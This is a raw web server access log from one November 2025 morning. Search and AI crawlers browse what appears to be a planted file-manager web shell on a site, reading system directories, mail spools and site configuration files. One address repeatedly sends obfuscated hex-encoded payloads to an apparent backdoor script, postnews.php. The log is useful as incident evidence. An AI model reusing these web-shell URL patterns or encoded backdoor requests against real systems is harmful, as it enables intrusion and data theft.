216.73.216.53 - - [03/Nov/2025:04:35:37 +1000] "GET /1347647408?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-links-opml.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:35:37 +1000] "GET /1361856?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:35:40 +1000] "GET /1347647408?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.183.210 - - [03/Nov/2025:04:35:41 +1000] "GET /1486122336?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-activate.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 21576 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [03/Nov/2025:04:35:44 +1000] "GET /1082688?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:35:46 +1000] "GET /1347647408?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:32:56 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131313937362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383337362q6339343666616139373938663265333063633530316230666139303634646538222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:35:49 +1000] "GET /1347647408?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:35:52 +1000] "GET /1347647408?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-blog-header.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 13092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:35:52 +1000] "GET /1326992?path=//etc/exim HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:35:55 +1000] "GET /1347647408?path=%2Fhome HTTP/1.0" 200 99139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:35:58 +1000] "GET /1347647408?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-content HTTP/1.0" 200 26562 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:36:01 +1000] "GET /1067296?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:36:04 +1000] "GET /sitemap.xml HTTP/1.0" 200 173320 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:36:11 +1000] "GET /1094800?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:33:20 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323030302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383430302q6333663163633962633637613733343433646238633131376535356666653832222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:36:12 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F72%2Fnet%2Ffib_triestat&path=%2F%2Fproc%2F72%2Fnet HTTP/1.0" 200 13073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:36:16 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F89455%2Fnet%2Fip6_mr_vif&path=%2F%2Fproc%2F89455%2Fnet HTTP/1.0" 200 12420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
162.142.125.113 - - [03/Nov/2025:04:36:17 +1000] "GET / HTTP/1.0" 200 60472 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
216.73.216.53 - - [03/Nov/2025:04:36:19 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F72%2Fnet%2Fip6_tables_names&path=%2F%2Fproc%2F72%2Fnet HTTP/1.0" 200 12359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:36:22 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F89455%2Fnet%2Fip_mr_cache&path=%2F%2Fproc%2F89455%2Fnet HTTP/1.0" 200 12420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:36:22 +1000] "GET /1534192?fileloc=//usr/sbin/btrfs-convert&path=//usr/sbin HTTP/1.0" 200 607670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:36:25 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F89455%2Fnet%2Fsoftnet_stat&path=%2F%2Fproc%2F89455%2Fnet HTTP/1.0" 200 13447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:36:28 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F72%2Fnet%2Funix&path=%2F%2Fproc%2F72%2Fnet HTTP/1.0" 200 31853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:36:31 +1000] "GET /1019632?path=//usr/src HTTP/1.0" 200 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:33:43 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323032332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383432332q3261383133393735386436373661356339383435353265313939616332646636222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:36:38 +1000] "GET /1534192?fileloc=//usr/sbin/wipefs&path=//usr/sbin HTTP/1.0" 200 51921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:36:46 +1000] "GET /1534192?fileloc=//usr/sbin/era_restore&path=//usr/sbin HTTP/1.0" 200 2076423 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:36:54 +1000] "GET /1135472?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:34:07 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323034372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383434372q3561666133626637386565646430356163396338333164303736356439313361222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:37:05 +1000] "GET /1238208?path=//etc/udev HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:37:11 +1000] "GET /1021712?path=//run/log HTTP/1.0" 200 14027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:37:17 +1000] "GET /1407376?path=//run/sudo HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:34:30 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323037302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383437302q3266666633346433376336623434656435363638356566373464363861336463222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:37:24 +1000] "GET /1529632?path=//run/udev HTTP/1.0" 200 19272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:37:30 +1000] "GET /1104816?path=//lib/rpm HTTP/1.0" 200 36419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:37:37 +1000] "GET /1067296?fileloc=//usr/sbin/rotatelogs&path=//usr/sbin HTTP/1.0" 200 37219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.244.168.102 - - [03/Nov/2025:04:37:43 +1000] "GET /1486122336?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/postnews.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.16.195.25 - - [03/Nov/2025:04:34:53 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323039332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383439332q3237633339333865666133343732653436356433633632353666393662643931222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:37:45 +1000] "GET /1067296?fileloc=//usr/sbin/autrace&path=//usr/sbin HTTP/1.0" 200 12310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:37:52 +1000] "GET /1319184?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:37:53 +1000] "GET /1720881040?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:37:58 +1000] "GET /1720478192?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F610942 HTTP/1.0" 200 23887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:37:59 +1000] "GET /1060880?path=//lib/grub HTTP/1.0" 200 14032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:38:01 +1000] "GET /1720910848?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fimages HTTP/1.0" 200 17611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:38:04 +1000] "GET /1720883536?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fgoogle8c847950a0446b02.html&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:38:06 +1000] "GET /1196704?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:35:16 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323131362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383531362q6534333737303936633330633062383262306632323733666361346332353136222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:38:08 +1000] "GET /1720470224?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:38:10 +1000] "GET /1720682224?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2F.htaccess&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 14647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:38:14 +1000] "GET /1445840?path=//var/log HTTP/1.0" 200 141085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:38:23 +1000] "GET /1522336?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:35:39 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323133392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383533392q6564336637356432343238636434356430353562663235393964313831346466222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:38:33 +1000] "GET /1036224?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:38:41 +1000] "GET /1277936?path=//run/log HTTP/1.0" 200 14027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.195.183.61 - - [03/Nov/2025:04:38:41 +1000] "GET /1486174400?path=/home/region-gk.ru/data/www/new.region-gk.ru/.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:04:38:46 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fjbd2_inode%2Fpoison&path=%2F%2Fsys%2Fkernel%2Fslab%2Fjbd2_inode HTTP/1.0" 200 12434 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:38:47 +1000] "GET /1209088?path=//etc/exim HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:38:50 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fslabs&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.0" 200 12448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:38:53 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-4096%2Fslabs&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-4096 HTTP/1.0" 200 12439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:36:03 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323136332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383536332q6161313336636637666134373032663530643261323364376339623663343163222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:38:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fsignal_cache%2Fpoison&path=%2F%2Fsys%2Fkernel%2Fslab%2Fsignal_cache HTTP/1.0" 200 12440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:38:57 +1000] "GET /1045072?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:38:59 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fuid_cache%2Fstore_user&path=%2F%2Fsys%2Fkernel%2Fslab%2Fuid_cache HTTP/1.0" 200 12435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:39:05 +1000] "GET /1021712?path=//lib/grub HTTP/1.0" 200 14032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:39:14 +1000] "GET /1218608?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:36:27 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323138372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383538372q3337646635396534633563646338643365646237663266626535343539303538222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:39:22 +1000] "GET /1361072?path=//run/sudo HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:39:30 +1000] "GET /1294688?path=//usr/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:39:37 +1000] "GET /1036224?fileloc=//usr/sbin/wpa_supplicant&path=//usr/sbin HTTP/1.0" 200 3049485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:36:50 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323231302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383631302q3532313437326136353465346238383839383130613332663431643836643438222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
51.195.183.229 - - [03/Nov/2025:04:39:45 +1000] "GET /1486174400?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/robots.txt&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 12627 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:04:39:46 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fpie0.gif&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:39:49 +1000] "GET /1125168?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:39:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-128%2Fslab_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-128 HTTP/1.0" 200 12440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:39:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdax_cache%2Fobjs_per_slab&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdax_cache HTTP/1.0" 200 12438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:39:57 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fbuffer_head%2Fshrink&path=%2F%2Fsys%2Fkernel%2Fslab%2Fbuffer_head HTTP/1.0" 200 12437 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:39:59 +1000] "GET /1485664?path=//etc/udev HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.141.79 - - [03/Nov/2025:04:40:01 +1000] "GET /2439124656?path=/home/region-gk.ru/data/www HTTP/1.0" 200 17137 "https://region-logist.ru/2439124656?shopdetail=2436249178" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
